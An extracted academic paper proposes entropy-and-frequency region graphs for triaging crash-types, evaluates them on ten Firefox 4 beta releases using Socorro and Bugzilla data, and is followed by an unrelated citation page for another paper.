For a crash-type $CT$ where all the users have the same probability of reporting $CT$ (i.e., $p_i = \frac{1}{n}$, $\forall i \in 1, 2, \ldots, n$), the entropy is maximal (i.e., 1). On the other hand, if a crash-type $CT$ is reported by only one user $i$, the entropy of $CT$ is minimal (i.e., 0). Crash-types with high entropy values are reported by more users. Therefore, such crash-types are likely to be easier to replicate than crash-types with low entropy values. When the entropy of a crash-type is low, it indicates that there is a gross propensity for a certain subset of users to report the crash-type, while other users rarely do so. Crash-types that have low entropy values may indicate that the anomaly is on the specific users side and not from the software system. Entropy values of crash-types could help developers and quality assurance teams identify problems with higher negative impact on users. The entropy of crash-types can also help developers identify crash-types that need better coverage, i.e., crash-types for which the recruitment of more users with a specific profile is needed to help developers replicate and fix their associated bug.
C. Entropy Analysis
We propose an entropy graph that can be used to triage crash-types. The entropy of a crash-type shows the distribution of the occurrences of crash-type among a set of users. However, the entropy of a crash-type solely doesn’t capture the magnitude of the occurrence of a crash-type. We propose to combine the entropy and the frequency values to better capture the overall effect of a crash-type on the users of a system. For example, crash-type $CT_1$ was reported by 3 users: A (40 crash reports), B (100 crash reports), and C (60 crash reports) out of a group of 100 users. Crash-type $CT_1$ has 200 reports in total. A crash-type $CT_2$ was reported by all the 100 users, with 2 reports each. Similarly, crash-type $CT_2$ has 200 reports as well. We define the probability distribution of a crash-type reported by users as the probability that a user $i$ reports the crash-type. For each user, we count the total number of crash reports of a crash-type reported by the user and divide it by the total number of crash reports of the crash-type that are reported by all the users. Hence, for our example, the probability of $UserA$ is $p(\text{User}A) = \frac{40}{200} = 0.2$. Similarly, the probabilities of $UserB$ and $UserC$ are $p(\text{User}B) = \frac{100}{200} = 0.5$, and $p(\text{User}C) = \frac{60}{200} = 0.3$, respectively. The normalized Shannon Entropy of $CT_1$ is 0.22. Since all the 100 users reported an equal number of reports for $CT_2$, the Shannon Entropy of $CT_2$ is 1. Although the frequencies of $CT_1$ and $CT_2$ are equal, their entropy values are very different. We propose to categorize crash-types of systems by the level of their entropy values (i.e., above a certain threshold), as well as the total frequency of their occurrence. Because the number of reported crash-types can be numerous, we propose to visualize all crash-types as points according to their entropy distribution value and frequency value on a region graph as shown in Figure 4. This makes it easier to see the general disposition of crash-types among all the users of a system. More specifically, each point on the graph represents a crash-type characterized by its entropy and frequency values. The $x$-axis represents the normalized frequency of crash-types. We compute the normalized frequency of a crash-type by dividing its frequency by the frequency of the most reported crash-type. The $y$-axis represents the entropy distribution of the crash-types. The maximum value on both axes is 1. As the frequency and entropy values increase across both axes, the probability that the crash-type covers a larger population of users increases.
### Table I
**SUMMARY OF ENTROPY REGIONS**
<table>
<thead>
<tr>
<th>Region</th>
<th>Entropy</th>
<th>Frequency</th>
<th>Priority</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>Highly Distributed</td>
<td>High</td>
<td>High</td>
<td>High</td>
<td>The crash-type is reported with high frequency and is well distributed among users, indicating that more users can report it consistently. More information on failing stack traces are available and developers will be able to easily replicate by selecting users from the testing base.</td>
</tr>
<tr>
<td>Skewed</td>
<td>Low</td>
<td>High</td>
<td>Medium</td>
<td>The crash-type is reported frequently, however the distribution is skewed towards certain users. The diversity of the reported stack traces is low. Developers may have to rely on certain beta users to replicate the crash.</td>
</tr>
<tr>
<td>Moderately Distributed</td>
<td>High</td>
<td>Low</td>
<td>Low</td>
<td>The crash-type is only reported by a selected number of users but they report it evenly. This indicates a specific user cluster that developer has to recruit from in order to replicate the crash.</td>
</tr>
<tr>
<td>Isolated</td>
<td>Low</td>
<td>Low</td>
<td>Very Low</td>
<td>This configuration is the least desirable from developers point of view. The crash-type is obscure and hard to replicate on any system. Very few information are provided on failing stack traces. Developers will have the hardest time resolving this crash.</td>
</tr>
</tbody>
</table>

**Figure 4.** Entropy distribution graph regions
### D. Crash-type Triaging
Having all the points on the graph can tell if a system is prone to isolated users reporting infrequent crash-types or whether it contains crash-types reported by the majority of users. We propose to divide the entropy graph into regions with different priorities as illustrated by Figure 4. Table I summarizes the possible regions that a crash-type can land and their different characteristics. The boundaries of the illustrated regions varies based on the context and maturity of systems. Developers and quality managers can make use of historical data from the field testing of previous versions of their systems to compute optimal boundaries. In this work, we use the median of frequencies and entropy values to identify the boundaries illustrated in Figure 4.
The triaging of crash-types is a process that typically depends on factors, such as the severity of crash-types, the frequency of crash-types and the effort required to fix the crash-type. Crash-types are sometimes purposely left unfixed for some of the following reasons: the crash-type occurs rarely and affects only few users and the effort required to fix the crash-type is large and expensive. Often, some crash-types are left unfixed because of the risk in attempting to fix them. Sliwerski et al. [5] observed that code changes that fix bugs in systems are up to two times more likely to introduce new bugs than other kinds of changes. An effective triaging of crash-types should allow developers to focus their time and effort on crashes that they are actually able to fix.
Taking into account the aforementioned triaging criteria, we make the following recommendations for the triage of crash-types using an entropy graph:
- **Highly Distributed Region:** crash-types with high frequency and entropy values (i.e., values above the median threshold) should be given a “high” priority.
- **Skewed Region:** a crash-type with a high frequency value but a low entropy, should be given a “medium” priority since it means that the crash-type only seriously affects a small proportion of users and is more likely to be specific to the user’s systems.
- **Moderately Distributed Region:** conversely, a crash-type with a high entropy value but low frequency means that it is well distributed among the users that report it, but does not occur very often to the majority of users and therefore should be given a “low” priority.
- **Isolated Region:** crash-types with low frequency and low entropy values should be given a “very low” priority since they are very rare and affect only a small number of users.
If additional information on the user perception of a crash-type is available, the priority of crash-types with low entropy values that are considered “critical”, “major”, or “blocker” should be raised to “high”. Developers should start fixing them as early as possible since they are likely to be hard to fix. This is due to the limited information provided by their failing threads and the difficulty of their replication.
Entropy graphs could also be used to assess the reliability of a population of testers. For example if a system has most of its crash-types in the skew region, the population of testers in general can be considered fairly reliable, since not every tester reports the same issues. If the majority of crash-types is in the Isolated region, the testing population as a whole would be fairly useless. There is a very limited number of bugs reported by testers and it may not be critical to investigate it.
III. Case Study
The goal of this case study is to assess the usefulness of entropy region graph in triaging crash-types. The motivation is the improvement and the automation of existing approaches for prioritizing crash-types. Developers and quality assurance teams could make use of entropy region graphs to automate the prioritization of their systems crash-types and reduce triaging time and effort. Quality managers could also use entropy region graphs to better plan testing activities of their systems and allocate support resources to reduce servicing costs.
Table II
Descriptive statistics of our data set
<table>
<thead>
<tr>
<th>version</th>
<th>release date</th>
<th>number of crash reports</th>
<th>median uptime (sec)</th>
<th>average crash/day</th>
</tr>
</thead>
<tbody>
<tr>
<td>4.0b1</td>
<td>6-Jul-10</td>
<td>608,912</td>
<td>388</td>
<td>28,996</td>
</tr>
<tr>
<td>4.0b2</td>
<td>27-Jul-10</td>
<td>350,387</td>
<td>321</td>
<td>23,359</td>
</tr>
<tr>
<td>4.0b3</td>
<td>11-Aug-10</td>
<td>348,531</td>
<td>373</td>
<td>26,810</td>
</tr>
<tr>
<td>4.0b4</td>
<td>24-Aug-10</td>
<td>530,624</td>
<td>427</td>
<td>37,902</td>
</tr>
<tr>
<td>4.0b5</td>
<td>7-Sep-10</td>
<td>455,091</td>
<td>52</td>
<td>65,013</td>
</tr>
<tr>
<td>4.0b6</td>
<td>14-Sep-10</td>
<td>1,698,163</td>
<td>935</td>
<td>29,803</td>
</tr>
<tr>
<td>4.0b7</td>
<td>29-Sep-10</td>
<td>1,848,218</td>
<td>686</td>
<td>44,999</td>
</tr>
<tr>
<td>4.0b8</td>
<td>22-Dec-10</td>
<td>871,034</td>
<td>544</td>
<td>37,872</td>
</tr>
<tr>
<td>4.0b9</td>
<td>14-Jan-11</td>
<td>608,949</td>
<td>572</td>
<td>55,359</td>
</tr>
<tr>
<td>4.0b10</td>
<td>25-Jan-11</td>
<td>529,195</td>
<td>716</td>
<td>47,028</td>
</tr>
</tbody>
</table>
The context of this study consists of data derived from the field testing of ten beta releases of Firefox, ranging from Firefox-4.0b1 to Firefox-4.0b10. Firefox is a free and open source web browser from the Mozilla Application Suite, managed by Mozilla Corporation. Since March 2011, Firefox has become the second most widely used browser in the world, with approximately 30% of usage share of web browsers [6]. Firefox runs on various operating systems including Microsoft Windows, GNU/Linux, Mac OS X, FreeBSD, and many other platforms. For each beta release, we downloaded all the reported crash-types and their associated bug-reports from the Socorro server and Bugzilla. Table II reports the descriptive statistics of our data set. The uptime in Table II is the duration in seconds for which Firefox was running before it crashed.
In the following subsections, we describe the data collection for our study. We present our research questions, and describe our analysis method. Then we present and discuss the results of our study.
A. Data Collection
When Firefox crashes on a user’s machine, the Mozilla Crash Reporter collects information about the event and sends a detailed crash report to the Socorro server [1].
A crash report includes the stack trace of the failing thread and other information about a user environment, such as operating system, Firefox version, install time, and a list of plug-ins installed. The Socorro server groups crash reports based on the top method signature of a stack trace to create a crash-type. Developers file bugs in Bugzilla and link them to the corresponding crash-types in Socorro server. A bug report contains detailed information about a bug, such as the bug open date, the last modification date, the bug severity, and the bug status. We mine the Socorro server to identify users reporting crash-types. We also mine Bugzilla repository to identify bug fix information. For each crash-type and its associated bugs, we compute several metrics to assess the effort needed to fix the crash-type. In the following, we discuss the details of each of these steps.
Identification of Users. Crash reports in the Socorro server do not contain personal information to identify unique users reporting the crashes due to privacy concerns. To identify users reporting crashes, we have to use heuristics. We parse the downloaded crash reports and extract the following available information on the crash events:
- the install age (in seconds) since the installation or the last update of the user’s system;
- the date at which the crash was processed on the server;
- the client crash date, i.e., the time on the user’s system when the crash occurred (this value can shift around with clock resets);
- the uptime (in seconds) since the user’s system was launched;
- the last crash of the user.
Other user’s environment information provided in crash reports includes: product, version, build, development branch, operating system name, operating system version, architecture (e.g., x86) + CPU family model and stepping, user comments, addons checked, flash version, and app notes (i.e., graphics card vendor id and device id).
For each crash report, we subtract the “install age” from the crash time to identify the point in time when the user reporting the crash have installed Firefox. We combine the user installation time with the information available on the user’s environment and the last crash times from the crash reports, to build a vector of unique profiles; each profile representing a user.
Identifying unique users reporting crash-types is important to compute the entropy of a crash-type. We associate each unique profile with the list of crash-types for which crash reports contain information corresponding to the profile.
Metrics Extraction. For all the bugs filed for all the crash-types from our 10 beta releases of Firefox 4 on the Socorro server, we retrieve bug reports from Bugzilla. Overall, 1,329 crash-types in our data set are linked to at least one bug. The total number of bugs is 1,733; where 519 bugs are fixed, 253 bugs are fixed duplicated bugs, and 961 bugs are left unfixed. We parse each of the bug reports to extract information about the bug open and modified dates. We compute the duration of the fixing period for each bug fixed (i.e., the difference between the bug open time and the last modification time). We compute the number of comments for each bug. The
number of comments in a bug report reflects the level of discussions between developers about the bug. It has been used in previous studies [2] to measure developers’ effort to fix a bug. We extract additional information on severity, priority, and status of bugs that are provided by Mozilla quality teams and are available in bug reports. We use the extracted priorities to compare our proposed triaging technique to the existing prioritization approach of Mozilla quality teams. For each crash-type with associated bugs with status “FIXED” and “CLOSED,” we compute the duration of the fixing period of the crash-type by differentiating the earliest bug open time of its associated bugs and the latest modification time of the associated bugs. We sum the number of comments of associated bugs to compute the effort needed to fix the crash-type. We also count the number of bugs linked to the crash-type to assess the complexity of the crash-type.
B. Research Questions
To assess the benefits of entropy region graphs for crash-types triaging, we aim at answering the following research questions:
1) **RQ1**: Can an analysis of the distribution of crash-types entropy help classify crash-types by the level of difficulty?
2) **RQ2**: Do crash-types belonging to different regions of an entropy graph possess different characteristics?
3) **RQ3**: Do entropy graphs help improve the triaging of crash-types?
C. Analysis Method
**RQ1.** We study whether an analysis of the distribution of crash-types entropy values could help classify the crash-types. This question is preliminary and aimed at providing quantitative evidence to support the intuition behind our study that the entropy of crash-types affects the difficulty to fix the crash-types. To assess the difficulty to fix a crash-type, we use the number of bugs associated to the crash-type, the duration of the fixing period of the crash-type as well as the number of comments exchanged by developers about the crash-type. These metrics have been used in previous studies on bug fixing [2].
We answer this research question in three steps: first, we investigate if crash-types with more bugs mapped to them have significantly different entropy values compared to crash-types that are associated with a single bug. We test the following null hypothesis:
\( H_{101}^{\text{RQ1}} : \text{the distribution of entropy values is the same for crash-types associated with many bugs and crash-types associated with single bug.} \)
Second, we compare the duration of the fixing period of crash-types with high entropy values to the duration of the fixing period of crash-types that have low entropy values. We test the following null hypothesis:
\( H_{102}^{\text{RQ1}} : \text{the distribution of the duration of a crash-type fixing period is the same for crash-types with high entropy values and crash-types that have low entropy values.} \)
We use the median to decide on high and low entropy values. Third we compare the number of comments exchanged by developers about crash-types with high entropy values to the number of comments of crash-types that have low entropy values. We test the following null hypothesis:
\( H_{103}^{\text{RQ1}} : \text{the distribution of the number of comments exchanged about a crash-type is the same for crash-types with high entropy values and crash-types that have low entropy values.} \)
**RQ2.** We want to understand to what extent the different regions of an entropy graph are able to discriminate crash-types of different characteristics. Similar to **RQ1**, we use the duration of the fixing period of a crash-type and the number of comments exchanged by developers about the crash-type to characterize the crash-type. We use the Kruskal-Wallis rank sum test to investigate if the distributions of durations of crash-types fixing period and the number of comments exchanged about crash-types are the same across the regions of the entropy graph. The Kruskal-Wallis rank sum test is a non-parametric statistical test used for testing the equality of the population medians among different groups. It is an extension of the Wilcoxon rank sum test to 3 or more groups. We therefore test the two following null hypothesis:
\( H_{101}^{\text{RQ2}} : \text{the distribution of the duration of a crash-type fixing period is the same for all crash-types across the regions of the entropy graph.} \)
\( H_{102}^{\text{RQ2}} : \text{the distribution of the number of comments exchanged about a crash-type is the same for all crash-types across the regions of the entropy graph.} \)
**RQ3.** The third research question evaluates the entropy based crash-type triaging approach presented in Section II-D. We extract severity and priority information from bug reports associated to crash-types from our data set. A preliminary analysis of bug reports revealed that the priority field is rarely used by the Mozilla quality team. Only 7% of bug reports contain a priority value. Therefore, in cases of absence of values in the priority field, we rely solely on severity values to recover the priority of crash-types. We use the following rule to estimate the priority of crash-types based on the severity levels of their associated bugs:
- We consider a crash-type to be of high priority if at least one of its associated bugs has a severity level either
“critical”, “major”, or “blocker”.
- When the highest severity level of the associated bugs is “normal”, we consider the priority of the crash-type to be “medium”.
- When the highest severity level of the associated bugs is “trivial”, we consider the priority of the crash-type to be “very low”.
- Otherwise the priority of the crash-type is considered “low”.
We compute the similarity between the priority levels assigned by our entropy based crash-type triaging approach and the priority levels of crash-types obtained from bug reports following Equation (2).
\[
\text{Similarity}(C) = \frac{N_T}{N} \tag{2}
\]
Where, \(C\) is a set of crash-types; \(N_T\) is the number of crash-types in \(C\) for which the priority level assigned by the entropy based triaging approach is the same as the priority extracted from bug reports; and \(N\) is the total number of crash-types in \(C\).
We use the status of bugs associated to crash-types (examples of status include FIXED, INVALID or WORKS-FOR-ME) and the durations of crash-types fixing period to further assess the benefits of our proposed triaging approach.
\[ \text{RQ1: Can an analysis of the distribution of crash-types entropy help classify crash-types by the level of difficulty?} \]
In this research question we are interested in assessing the relevance of entropy analysis of crash-types to identify the difficulty levels of crash-types. To test our first null hypothesis, we organize crash-types in two groups: the group of crash-types associated to single bug and the group of crash-types associated to multiple bugs. We compute the entropy value of each crash-type from the two groups following Equation (1). Results show that on average, the entropy value of a crash-type associated with multiple bugs is twice the entropy value of a crash-type with a single bug. We perform a Wilcoxon rank sum to verify the statistically significance of this difference and obtain a \(p\)-value of \(2.039e - 08\). Therefore, we reject \(H_{01}\). Crash-types linked to multiple bugs affect more users than crash-types linked to a single bug.
To test our second and third null hypothesis, we group fixed crash-types by the level of their entropy values. We use the median of entropy values as our threshold to build two groups: a group of crash-types with high entropy values and a group of crash-types with low entropy values. The entropy value of a crash-type is considered high if it is greater than the median of the entropy values of all the crash-types. Otherwise, it is considered low.
For each crash-type from the two groups, we compute the duration of the fixing period of the crash-type. We observe that in average, crash-types with high entropy values take longer to get fixed compared to crash-types with low entropy values. We perform a Wilcoxon rank sum and obtain a \(p\)-value of 0.006. Therefore, we reject \(H_{02}\). We compute the number of comments exchanged about each crash-type from our two groups. In average, 55.5 comments were exchanged for crash-types with high entropy values compared to 17.65 comments for crash-types with low entropy values. We perform a Wilcoxon rank sum and obtain a \(p\)-value of 0.001. Hence, we reject \(H_{03}\). Crash-types with high entropy values take longer to get fixed and more comments are exchanged during their fixing period.
Although one could have expected crash-types with low entropy values to take a longer time to get fixed and spark more discussion, because of the potential difficulty of their replication, our result shows the opposite. We explain this finding by the fact that many crash-types with low entropy values are left unfixed. In fact, 20% of crash-types with low entropy values in our data set never got fixed and in our analysis we have only considered crash-types whose underlying bugs are eventually fixed.
We conclude that an entropy analysis can help developers and quality managers identify crash-types that will be particularly difficult to fix, because they would likely be related to many bugs. A situation that will likely result in longer fixing periods and more contributions efforts from developers. Therefore, we answer positively our research question.
\[ \text{RQ2: Do crash-types belonging to different regions of an entropy graph possess different characteristics?} \]
To answer this research question, we compute for each fixed crash-type from our data set, the duration of its fixing period and the number of comments exchanged by developers about the crash-type. We also compute the entropy and frequency values of the crash-type and map the crash-type into a region of the entropy graph. We organize the crash-types in four groups corresponding to the four regions of the entropy graph that are illustrated on Figure 4.
We observe that crash-types from the Skewed region take the longest time to get fixed. Their average fixing time is 21,169 hours. Followed by crash-types from the Moderately Distributed region with an average of 8,475 hours. The average fixing time of crash-types from the Highly Distributed region is 4,299 hours. Crash-types from the Isolated region take in average 3,562 hours to get fixed. We perform the Kruskal-Wallis rank sum test on the durations of crash-types fixing periods from the four regions and obtain a \(p\)-value of 0.005. Therefore, we reject \(H_{02}\).
The number of comments exchanged by developers about the crash-types is significantly different across the groups formed by the regions of the entropy graph. We obtain a \(p\)-value of \(2.2e - 16\) for the Kruskal-Wallis rank sum test.
We observe that the average comments rate for a crash-type in the Highly Distributed region is 22 comments and the average comments rate in the Moderately Distributed region is 20 comments. The average comment rate is the highest for crash-types from the Skewed region (67 comments) and the lowest for crash-types from the Isolated region (9 comments). Hence, we reject $H_{G2}^2$.
Crash-types from the Skewed region appear to be harder to fix. The duration of their fixing period is in average five time the duration of the fixing period of a crash-type from the Highly Distributed region. The average comments rate in the Skewed region is three times the average comments rate in the Highly Distributed region. This result is expected. Because of the low entropy of crash-types from the Skew region, developers are likely to have difficulties finding enough information to replicate and fix the crash. This result complements our findings from (RQ1) that crash-types with low entropy values require less effort to get fixed. In fact, we observe now that when a crash-type with a low entropy value has a high frequency, the effort required to fix the crash-type becomes very high. A finding that also confirms our intuition from Section II-C that a combination of entropy and frequency values provides a better assessment of the overall impact of a crash-type than either frequency or entropy solely.
When both frequency and entropy values of a crash-type are low (i.e., the crash-type belongs to the Isolated region), we observe that it takes less time for developers to fix the crash-type. We explain this result by the fact that crash-types from the Isolated region are likely to be more simpler, since they occur infrequently and are encountered by few users. In some cases, as discussed in Section II-B these crash-types may be the results of some anomalies on users’ side and not from the system. Moreover we observed in our data set that 19.2% of crash-types from the Isolated region are purposely left unfixed.
We conclude from above results that crash-types from the four regions of our entropy graph possess very different characteristics and require different levels of effort from developers. This answers our second research question in the positive.
**RQ3: Do entropy graphs help improve the triaging of crash-types?** To assess the benefits of using entropy graphs for crash-types triaging, we compute the similarity between the priority levels assigned by our entropy based crash-type triaging approach and the priority levels of crash-types obtained from bug reports following Equation (2). Table III summarizes the obtained results. Except for crash-types from the Isolated region, the priorities assigned by the entropy based triaging approach are the same as the priority levels obtained from bug reports.
We investigated crash-types from the Isolated region and found that although they occurred infrequently and affected only a small number of users, the Mozilla quality team assigned a “critical” severity level to 80% of bugs linked to crash-types from the Isolated region. Overall 89.3% of bugs in our data set were found with a “critical”, “major”, or “blocker” severity value. A very high number that hints at a potential inaccuracy in the manual triaging process of Mozilla quality teams. Moreover, we observed that 17% of crash-types from the Isolated region that are assigned a high priority by the Mozilla quality teams are left unfixed. The age of bugs linked to unfixed crash-types with high priority values ranges from 3 months to 7 years and 9 months, while the median age of a fixed bug in our data set is only 2.3 months. For the remaining 83% of crash-types with high priority values in the Isolated region, they required in average 4,620.74 hours from Mozilla developers, with a median fixing duration of 1,680.5 hours. A slower fixing process if compared to the time spent by the same developers to fix “low” priority crash-types (which is 2,353.73 hours in average, with a median of 1,104 hours). From these observations, we conclude that although Mozilla quality teams sometimes assign high priorities to crash-types from the Isolated region, they do not fix these crash-types in the same timely manner associated with other high priority crash-types in different regions. These results suggest that the crash-type triaging process currently used by Mozilla quality teams should be improved to better reflect the concrete levels of attention paid by developers when fixing crashes.
We answer positively our research question and conclude that entropy graphs provide a better triaging of crash-types than current Mozilla triage teams. We suggest that developers and quality assurance teams can use our proposed automatic entropy based triaging approach to speed up and improve their crash-types triaging.
### Table III
<table>
<thead>
<tr>
<th>Region</th>
<th>Similarity</th>
</tr>
</thead>
<tbody>
<tr>
<td>Highly Distributed</td>
<td>100%</td>
</tr>
<tr>
<td>Skewed</td>
<td>100%</td>
</tr>
<tr>
<td>Moderately Distributed</td>
<td>100%</td>
</tr>
<tr>
<td>Isolated</td>
<td>19%</td>
</tr>
</tbody>
</table>
### IV. Threats to Validity
We now discuss the threats to validity of our study following the guidelines for case study research [8].
**Construct validity threats** concern the relation between theory and observation. In this work, the construct validity threats are mainly due to measurement errors. We extract crash and bugs information by parsing their corresponding html (crash reports) and xml (bug reports) files. We use a heuristic based on “install age”, “last crash times”, configuration and architecture of crashing systems to identify the unique users of our studied versions of Mozilla Firefox. Since our study critically relies on the identification of users reporting the crash-types. Prior to this study, we have
exchanged with members of the quality assurance team at the Mozilla Foundation to confirm our user identification heuristic. We also randomly sampled 10 of our identified users profiles and manually verified the consistency of information in the crash reports of their reported crash-types. In two cases, we had to merge the profiles because of high similarities in their respective crash reports. We found the other profiles to be consistent and unique. More validations of our identified users set are needed to strengthen the findings of this study. Another construct validity threat concerns missing priority information in bug reports, we use a heuristic based on severity levels to estimate priorities. A severity level indicates the seriousness of a bug. Developers refer to severity levels when fixing bugs.
Threats to internal validity do not affect this study since we do not claim causation [8]. We simply report our observations and try to provide explanations to these observations.
Conclusion validity threats concern the relation between the treatment and the outcome. We paid attention not to violate assumptions of the performed statistical tests. We used non-parametric tests that do not require making assumptions about the distribution of data sets.
Reliability validity threats concern the possibility of replicating this study. We attempt to provide all the necessary details to replicate our results. Both the Socorro crash server and Bugzilla are made publicly available. Interested researchers could obtain the same data for the same releases of Firefox.
Threats to external validity concern the possibility to generalize our results. Although this study is limited to 10 releases of Firefox, we obtain results consistent with previous findings [2] that current triaging process fail to ensure that developers time is spent on more critical bugs that will actually get fixed. Nevertheless, further studies with different systems and different crash triaging systems are desirable to make our findings more generic.
V. RELATED WORK
In this section, we introduce related literature on triage in software testing and discuss entropy analysis in software engineering studies.
A. Triage in Software Testing
Several researchers have developed techniques and tools to help developers and quality assurance teams improve their triaging activities. Jeong et al. [9] have investigated the reassignment of bug reports and propose the use of tossing graphs to support bug triaging activities. Anvik et al. [3] propose a semi-automated approach to assign developers to bug reports. This approach is based on a machine learning algorithm that learns the kinds of reports resolves by each developers in the past and suggests a small number of best candidate developers for each new bug. Canfora and Cerulo [10] propose a semi-automatic method that suggests the set of best candidate developers suitable to resolve new change requests. The method retrieves the candidate developers using the textual description of the change requests. Menzies and Marcus [11] propose SEVERIS, an automated method to assist triage teams in assigning severity levels to bug reports. A machine learning algorithm is used to learn the severity levels from existing sets of bugs reports. Weiss et al. [12] introduce an approach to help triage teams automatically predict the durations of bug fixing period. This enables them to perform early effort estimations and to better assign the issues. Different from aforementioned approaches, which have focused on bug triage, our study analyzes crash triage and proposes a new triaging approach for crash-types. Since crash-types are linked to bugs, triage teams could combine the results of our entropy based crash-types triaging approach with previous bug triaging techniques to assign developers to crash-types, or to make a decision on when to fix a crash-type (e.g., a crash-type that would take too long to get fixed may be purposely left unfixed until a future release).
B. Entropy Analysis in Software Engineering Studies
Entropy measures are extensively used in software engineering studies. Hassan et al. [13] in their investigation of the complexity of software development processes use the Shannon entropy to measure the complexity of systems and conclude that systems with higher entropy rates are more complex and decay overtime. Similarly, Zaman et al. [14] in their comparative study of security and performance bugs apply the same normalized Shannon entropy on bug fixing patches to assess the complexity of bug fixes. Bianchi et al. [15] propose the use of entropy metrics to monitor the degradation of software systems. They develop a tool based on software representation models to automatically compute entropy metrics before and after every maintenance intervention. Hafiz et al. [16] treat a software system as an information source and used Shannon, Hartley and Renyi entropy measures to extract different types of information from the system. They remarked that files that are more functional and descriptive provide a larger amount of entropy. Kim et al. [17] propose new software complexity metrics (i.e., class complexity and inter-object complexity) for object oriented software systems based on the traditional Shannon entropy. Chapin et al. [18] analyze entropy metrics of software systems and conclude that by observing any abrupt change in the entropy of a software system, one can gather a good insight on how the maintenance of the software system should be performed.
Another interesting take on entropy analysis is the work by Unger et al. [19] which use the Shannon entropy measure to quantify information content in databases and propose a measure of the general vulnerability of databases based on entropy values. Similar to our study, they analyzed large software repositories and propose a technique based on entropy analysis.
VI. Conclusion
Triaging crash-types is a crucial software maintenance activity. A good triaging of crash-types is essential to allow developers and maintainers to focus their efforts more efficiently. Our study proposes a new triaging approach based on an entropy analysis of crash-types. The new approach introduces a concept of entropy graph regions to assign priority values to crash-types.
Quantitatively, we have showed that entropy analysis helps classify crash-types by their level of difficulty. We have also showed the ability of entropy regions to discriminate crash-types of different characteristics. We evaluate the proposed entropy-based triaging approach by comparing the similarity between its assigned priority levels and the priority levels of crash-types obtained from bug reports. We obtain that for all the regions except the Isolated region, the priorities assigned by the entropy-based triaging approach are the same as the priority levels obtained from bug reports. A further analysis of the priorities in the Isolated region reveals that although Mozilla quality teams sometimes assign high priorities to crash-types from the Isolated region, they do not fix these crash-types in priority. Our result suggests the necessity to improve the current crash-type triaging process of Mozilla quality teams. Therefore, the priorities assigned based on entropy values better reflect the priorities that are applied by developers when fixing the crashes. Developers and quality assurance teams could make use of our proposed automatic entropy-based triaging approach to improve their crash-type triaging and better plan their testing and maintenance activities. In future work, we plan to perform further validation of our approach on different systems using different crash triaging processes.
References
|
{"Source-Url": "http://swat.polymtl.ca/~foutsekh/docs/Khomh-WCRE-entropy.pdf", "len_cl100k_base": 10659, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 34961, "total-output-tokens": 12683, "length": "2e13", "weborganizer": {"__label__adult": 0.0003294944763183594, "__label__art_design": 0.0003809928894042969, "__label__crime_law": 0.0003192424774169922, "__label__education_jobs": 0.001232147216796875, "__label__entertainment": 9.489059448242188e-05, "__label__fashion_beauty": 0.0001455545425415039, "__label__finance_business": 0.00038361549377441406, "__label__food_dining": 0.0002620220184326172, "__label__games": 0.0012331008911132812, "__label__hardware": 0.0007219314575195312, "__label__health": 0.0003695487976074219, "__label__history": 0.00026154518127441406, "__label__home_hobbies": 8.45789909362793e-05, "__label__industrial": 0.0002505779266357422, "__label__literature": 0.0004172325134277344, "__label__politics": 0.00019812583923339844, "__label__religion": 0.00028824806213378906, "__label__science_tech": 0.0273590087890625, "__label__social_life": 9.876489639282228e-05, "__label__software": 0.01543426513671875, "__label__software_dev": 0.94921875, "__label__sports_fitness": 0.00020420551300048828, "__label__transportation": 0.0003247261047363281, "__label__travel": 0.0001659393310546875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54611, 0.0301]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54611, 0.14467]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54611, 0.90186]], "google_gemma-3-12b-it_contains_pii": [[0, 5439, false], [5439, 9844, null], [9844, 14204, null], [14204, 19466, null], [19466, 25694, null], [25694, 31046, null], [31046, 36647, null], [36647, 42470, null], [42470, 48383, null], [48383, 54611, null]], "google_gemma-3-12b-it_is_public_document": [[0, 5439, true], [5439, 9844, null], [9844, 14204, null], [14204, 19466, null], [19466, 25694, null], [25694, 31046, null], [31046, 36647, null], [36647, 42470, null], [42470, 48383, null], [48383, 54611, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54611, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54611, null]], "pdf_page_numbers": [[0, 5439, 1], [5439, 9844, 2], [9844, 14204, 3], [14204, 19466, 4], [19466, 25694, 5], [25694, 31046, 6], [31046, 36647, 7], [36647, 42470, 8], [42470, 48383, 9], [48383, 54611, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54611, 0.14201]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
80520257ec523adcc8fce26971570bc5970dc630
|
Empirical analyses of the factors affecting confirmation bias and the effects of confirmation bias on software developer/tester performance
Conference or Workshop Item
How to cite:
For guidance on citations see FAQs.
© [not recorded]
Version: Accepted Manuscript
Link(s) to article on publisher’s website:
http://dx.doi.org/doi:10.1145/1868328.1868344
Copyright and Moral Rights for the articles on this site are retained by the individual authors and/or other copyright owners. For more information on Open Research Online’s data policy on reuse of materials please consult the policies page.
Empirical Analyses of the Factors Affecting Confirmation Bias and the Effects of Confirmation Bias on Software Developer/Tester Performance
Gul Calikli
Software Research Laboratory
Department of Computer Engineering,
Bogazici University, Turkey
0090 212 3595400-7227
gul.calikli@boun.edu.tr
Ayse Bener
Ted Rogers School of Information Technology Management,
Ryerson University, Canada
0001 416 9795297
ayse.bener@ryerson.ca
ABSTRACT
